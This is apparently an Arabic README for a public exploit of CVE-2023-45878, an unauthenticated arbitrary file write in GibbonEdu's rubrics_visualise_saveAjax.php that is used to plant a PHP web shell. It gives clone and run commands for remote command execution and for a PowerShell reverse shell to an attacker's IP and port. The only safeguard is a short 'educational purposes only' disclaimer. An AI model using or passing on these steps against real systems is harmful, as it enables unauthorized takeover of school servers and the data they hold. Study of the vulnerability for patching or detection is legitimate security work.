
GibbonEdu — كتابة ملفات تعسفية تؤدي إلى تنفيذ تعليمات برمجية عن بُعد
GibbonEdu: كتابة ملفات تعسفية لتنفيذ Web Shell
يحتوي هذا المستودع على استغلال لـ CVE-2023-45878، وهي ثغرة كتابة ملفات تعسفية في GibbonEdu. تؤثر الثغرة على نقطة النهاية rubrics_visualise_saveAjax.php وتسمح لمهاجم غير مصادق برفع ملفات تعسفية إلى خادم الويب.
يستغل هذا السكربت الثغرة لرفع PHP Web Shell وإمّا:
يدعم السكربت وضعين للتشغيل:
--command (-c): تنفيذ أمر نظام محدد عن بُعد.--shell (-s): تشغيل PowerShell reverse shell إلى مستمع المهاجم.git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>
هذا السكربت مخصص للأغراض التعليمية فقط. الاستخدام غير المصرح به لهذا الاستغلال على أنظمة دون إذن يعد غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار ناتجة عن هذا الاستغلال.